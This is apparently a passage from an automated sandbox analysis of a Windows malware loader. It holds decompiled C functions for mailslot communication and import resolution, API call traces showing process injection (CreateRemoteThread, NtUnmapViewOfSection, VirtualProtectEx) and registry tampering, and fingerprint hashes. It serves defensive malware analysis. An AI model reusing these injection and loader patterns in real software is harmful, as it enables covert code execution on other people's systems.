  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}
APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}
APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}
APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
